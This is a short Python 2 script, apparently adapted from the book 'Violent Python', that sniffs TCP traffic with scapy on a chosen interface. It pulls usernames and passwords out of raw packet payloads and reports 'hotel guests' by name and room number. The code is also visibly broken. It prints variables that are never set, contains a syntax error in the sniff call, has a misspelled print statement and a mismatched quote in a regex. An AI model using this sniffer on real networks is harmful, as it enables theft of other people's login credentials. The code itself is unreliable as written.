#!/usr/bin/env python2
# written by Moses Arocha
# Written with the help of TJ O'Connor in his book "Violent Python"

import optparse
from scapy.all import *

def findGuest(pkt):
  	raw = pkt.sprintf('%Raw.load%')
 	Username = re.findall('(?i)username=(.*)&', raw)
  	Password = re.findall("(?i)password=(.*)'", raw)
  if name:
    	print '[Success] Found Hotel Guest ' + str(name[0]) + ', Room #' + str(room[0])

def main():
	parser = optparse.OptionParser('Uses Of Program -i <Interface>')
	parser.add_option('-i', dest='interface', type='string', help='Specify Interface To Listen On')
	(options, args) = parser.parse_args()
	if options.interface == None:
		printparser.usage
		exit(0)
	else:
		conf.iface = options.interface
	try:
		print '[*] Starting Hotel Guest Sniffer'
		sniff(filter='tcp', prn=findGuest=, store=0)
	except KeyboardInterrupt:
		exit(0)
	
if __name__ == '__main__':
	main()
